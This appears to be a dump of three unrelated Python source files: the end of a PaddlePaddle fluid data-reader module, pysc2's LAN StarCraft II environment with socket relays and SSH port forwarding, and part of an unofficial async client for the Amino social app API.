# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The data will copy to target place with a
double buffer queue. If the target place is None, the place that executor
perform on will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
place(Place): the place of target data. Default is the sample place of
executor perform.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.open_files(filenames=['mnist.recordio'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(
filenames=['./data1.recordio', './data2.recordio'],
shapes=[(3, 224, 224), (1, )],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@signature_safe_contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog._create_block()
yield
self.main_prog._rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in six.moves.range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
|
lan_sc2_env.py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Starcraft II environment for playing LAN games vs humans.
Check pysc2/bin/play_vs_agent.py for documentation.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import binascii
import collections
import hashlib
import json
from absl import logging
import os
import socket
import struct
import subprocess
import threading
from pysc2 import run_configs
from pysc2.env import sc2_env
from pysc2.lib import run_parallel
import whichcraft
from s2clientprotocol import sc2api_pb2 as sc_pb
class Addr(collections.namedtuple("Addr", ["ip", "port"])):
def __str__(self):
ip = "[%s]" % self.ip if ":" in self.ip else self.ip
return "%s:%s" % (ip, self.port)
def daemon_thread(target, args):
t = threading.Thread(target=target, args=args)
t.daemon = True
t.start()
return t
def udp_server(addr):
family = socket.AF_INET6 if ":" in addr.ip else socket.AF_INET
sock = socket.socket(family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.bind(addr)
return sock
def tcp_server(tcp_addr, settings):
"""Start up the tcp server, send the settings."""
family = socket.AF_INET6 if ":" in tcp_addr.ip else socket.AF_INET
sock = socket.socket(family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
sock.bind(tcp_addr)
sock.listen(1)
logging.info("Waiting for connection on %s", tcp_addr)
conn, addr = sock.accept()
logging.info("Accepted connection from %s", Addr(*addr))
# Send map_data independently for py2/3 and json encoding reasons.
write_tcp(conn, settings["map_data"])
send_settings = {k: v for k, v in settings.items() if k != "map_data"}
logging.debug("settings: %s", send_settings)
write_tcp(conn, json.dumps(send_settings).encode())
return conn
def tcp_client(tcp_addr):
"""Connect to the tcp server, and return the settings."""
family = socket.AF_INET6 if ":" in tcp_addr.ip else socket.AF_INET
sock = socket.socket(family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
logging.info("Connecting to: %s", tcp_addr)
sock.connect(tcp_addr)
logging.info("Connected.")
map_data = read_tcp(sock)
settings_str = read_tcp(sock)
if not settings_str:
raise socket.error("Failed to read")
settings = json.loads(settings_str.decode())
logging.info("Got settings. map_name: %s.", settings["map_name"])
logging.debug("settings: %s", settings)
settings["map_data"] = map_data
return sock, settings
def log_msg(prefix, msg):
logging.debug("%s: len: %s, hash: %s, msg: 0x%s", prefix, len(msg),
hashlib.md5(msg).hexdigest()[:6], binascii.hexlify(msg[:25]))
def udp_to_tcp(udp_sock, tcp_conn):
while True:
msg, _ = udp_sock.recvfrom(2**16)
log_msg("read_udp", msg)
if not msg:
return
write_tcp(tcp_conn, msg)
def tcp_to_udp(tcp_conn, udp_sock, udp_to_addr):
while True:
msg = read_tcp(tcp_conn)
if not msg:
return
log_msg("write_udp", msg)
udp_sock.sendto(msg, udp_to_addr)
def read_tcp(conn):
read_size = read_tcp_size(conn, 4)
if not read_size:
return
size = struct.unpack("@I", read_size)[0]
msg = read_tcp_size(conn, size)
log_msg("read_tcp", msg)
return msg
def read_tcp_size(conn, size):
"""Read `size` number of bytes from `conn`, retrying as needed."""
chunks = []
bytes_read = 0
while bytes_read < size:
chunk = conn.recv(size - bytes_read)
if not chunk:
if bytes_read > 0:
logging.warning("Incomplete read: %s of %s.", bytes_read, size)
return
chunks.append(chunk)
bytes_read += len(chunk)
return b"".join(chunks)
def write_tcp(conn, msg):
log_msg("write_tcp", msg)
conn.sendall(struct.pack("@I", len(msg)))
conn.sendall(msg)
def forward_ports(remote_host, local_host, local_listen_ports,
remote_listen_ports):
"""Forwards ports such that multiplayer works between machines.
Args:
remote_host: Where to ssh to.
local_host: "127.0.0.1" or "::1".
local_listen_ports: Which ports to listen on locally to forward remotely.
remote_listen_ports: Which ports to listen on remotely to forward locally.
Returns:
The ssh process.
Raises:
ValueError: if it can't find ssh.
"""
if ":" in local_host and not local_host.startswith("["):
local_host = "[%s]" % local_host
ssh = whichcraft.which("ssh") or whichcraft.which("plink")
if not ssh:
raise ValueError("Couldn't find an ssh client.")
args = [ssh, remote_host]
for local_port in local_listen_ports:
args += ["-L", "%s:%s:%s:%s" % (local_host, local_port,
local_host, local_port)]
for remote_port in remote_listen_ports:
args += ["-R", "%s:%s:%s:%s" % (local_host, remote_port,
local_host, remote_port)]
logging.info("SSH port forwarding: %s", " ".join(args))
return subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE, close_fds=(os.name == "posix"))
class RestartException(Exception):
pass
class LanSC2Env(sc2_env.SC2Env):
"""A Starcraft II environment for playing vs humans over LAN.
This owns a single instance, and expects to join a game hosted by some other
script, likely play_vs_agent.py.
"""
def __init__(self, # pylint: disable=invalid-name
_only_use_kwargs=None,
host="127.0.0.1",
config_port=None,
race=None,
agent_interface_format=None,
discount=1.,
visualize=False,
step_mul=None,
replay_dir=None):
"""Create a SC2 Env that connects to a remote instance of the game.
This assumes that the game is already up and running, and it only needs to
join. You need some other script to launch the process and call
RequestCreateGame. It also assumes that it's a multiplayer game, and that
the ports are consecutive.
You must pass a resolution that you want to play at. You can send either
feature layer resolution or rgb resolution or both. If you send both you
must also choose which to use as your action space. Regardless of which you
choose you must send both the screen and minimap resolutions.
For each of the 4 resolutions, either specify size or both width and
height. If you specify size then both width and height will take that value.
Args:
_only_use_kwargs: Don't pass args, only kwargs.
host: Which ip to use. Either ipv4 or ipv6 localhost.
config_port: Where to find the config port.
race: Race for this agent.
agent_interface_format: AgentInterfaceFormat object describing the
format of communication between the agent and the environment.
discount: Returned as part of the observation.
visualize: Whether to pop up a window showing the camera and feature
layers. This won't work without access to a window manager.
step_mul: How many game steps per agent step (action/observation). None
means use the map default.
replay_dir: Directory to save a replay.
Raises:
ValueError: if the race is invalid.
ValueError: if the resolutions aren't specified correctly.
ValueError: if the host or port are invalid.
"""
if _only_use_kwargs:
raise ValueError("All arguments must be passed as keyword arguments.")
if host not in ("127.0.0.1", "::1"):
raise ValueError("Bad host arguments. Must be a localhost")
if not config_port:
raise ValueError("Must pass a config_port.")
if agent_interface_format is None:
raise ValueError("Please specify agent_interface_format.")
if not race:
race = sc2_env.Race.random
self._num_agents = 1
self._discount = discount
self._step_mul = step_mul or 8
self._save_replay_episodes = 1 if replay_dir else 0
self._replay_dir = replay_dir
self._score_index = -1 # Win/loss only.
self._score_multiplier = 1
self._episode_length = 0 # No limit.
self._run_config = run_configs.get()
self._parallel = run_parallel.RunParallel() # Needed for multiplayer.
interface = self._get_interface(
agent_interface_format=agent_interface_format, require_raw=visualize)
self._launch_remote(host, config_port, race, interface)
self._finalize([agent_interface_format], [interface], visualize)
def _launch_remote(self, host, config_port, race, interface):
"""Make sure this stays synced with bin/play_vs_agent.py."""
self._tcp_conn, settings = tcp_client(Addr(host, config_port))
self._map_name = settings["map_name"]
if settings["remote"]:
self._udp_sock = udp_server(
Addr(host, settings["ports"]["server"]["game"]))
daemon_thread(tcp_to_udp,
(self._tcp_conn, self._udp_sock,
Addr(host, settings["ports"]["client"]["game"])))
daemon_thread(udp_to_tcp, (self._udp_sock, self._tcp_conn))
extra_ports = [
settings["ports"]["server"]["game"],
settings["ports"]["server"]["base"],
settings["ports"]["client"]["game"],
settings["ports"]["client"]["base"],
]
self._sc2_procs = [self._run_config.start(
extra_ports=extra_ports, host=host, version=settings["game_version"],
window_loc=(700, 50))]
self._controllers = [p.controller for p in self._sc2_procs]
# Create the join request.
join = sc_pb.RequestJoinGame(options=interface)
join.race = race
join.shared_port = 0 # unused
join.server_ports.game_port = settings["ports"]["server"]["game"]
join.server_ports.base_port = settings["ports"]["server"]["base"]
join.client_ports.add(game_port=settings["ports"]["client"]["game"],
base_port=settings["ports"]["client"]["base"])
self._controllers[0].save_map(settings["map_path"], settings["map_data"])
self._controllers[0].join_game(join)
def _restart(self):
# Can't restart since it's not clear how you'd coordinate that with the
# other players.
raise RestartException("Can't restart")
def close(self):
if hasattr(self, "_tcp_conn") and self._tcp_conn:
self._tcp_conn.close()
self._tcp_conn = None
if hasattr(self, "_udp_sock") and self._udp_sock:
self._udp_sock.close()
self._udp_sock = None
super(LanSC2Env, self).close()
|
client.py
|
import json
import base64
import aiohttp
import asyncio
import threading
from uuid import uuid4
from time import timezone, sleep
from typing import BinaryIO, Union
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
SocketHandler.__init__(self, self, debug=socketDebugging)
Callbacks.__init__(self, self)
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
self.session = aiohttp.ClientSession()
def __del__(self):
try:
loop = asyncio.get_event_loop()
loop.create_task(self._close_session())
except RuntimeError:
loop = asyncio.new_event_loop()
loop.run_until_complete(self._close_session())
async def _close_session(self):
if not self.session.closed: await self.session.close()
def parse_headers(self, data = None):
if not data:
return headers.Headers(data=data, deviceId=self.device_id).headers
else:
return headers.Headers(deviceId=self.device_id).headers
async def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
async def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
await self.send(data)
async def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
async def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
sleep(1)
async def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
await self.send(data)
self.active = True
threading.Thread(target=self.run_vc, args=[comId, chatId, joinType])
async def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
async def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = await self.get_user_info(uId)
self.profile: objects.UserProfile = await self.get_user_info(uId)
headers.sid = self.sid
await self.startup()
async def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else:
self.authenticated = True
self.json = json.loads(await response.text())
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
await self.startup()
return response.status
async def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/register", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
self.account: None
self.profile: None
headers.sid = None
await self.close()
await self.session.close()
return response.status
async def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/persona/profile/basic", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def request_verify_code(self, email: str, resetPassword: bool = False):
"""
Request an verification code to the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
async with self.session.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
async def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
async with self.session.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
async with self.session.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_account_info(self):
async with self.session.get(f"{self.api}/g/s/account", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfile(json.loads(await response.text())["account"]).UserProfile
async def upload_media(self, file: BinaryIO, fileType: str):
"""
Upload file to the amino servers.
**Parameters**
- **file** : File to be uploaded.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
async with self.session.post(f"{self.api}/g/s/media/upload", headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["mediaValue"]
def handle_socket_message(self, data):
return self.resolve(data)
async def get_eventlog(self, language: str = "en"):
async with self.session.get(f"{self.api}/g/s/eventlog/profile?language={language}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())
async def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
async with self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommunityList(json.loads(await response.text())["communityList"]).CommunityList
async def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
async with self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["communityList"]
async def get_user_info(self, userId: str):
"""
Information of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfile(json.loads(await response.text())["userProfile"]).UserProfile
async def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.ThreadList(json.loads(await response.text())["threadList"]).ThreadList
async def get_chat_thread(self, chatId: str):
"""
Get the Chat Object from an Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Thread(json.loads(await response.text())["thread"]).Thread
async def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
async with self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["memberList"]).UserProfileList
async def join_chat(self, chatId: str):
"""
Join an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def leave_chat(self, chatId: str):
"""
Leave an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def start_chat(self, userId: Union[str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
Start an Chat with an User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
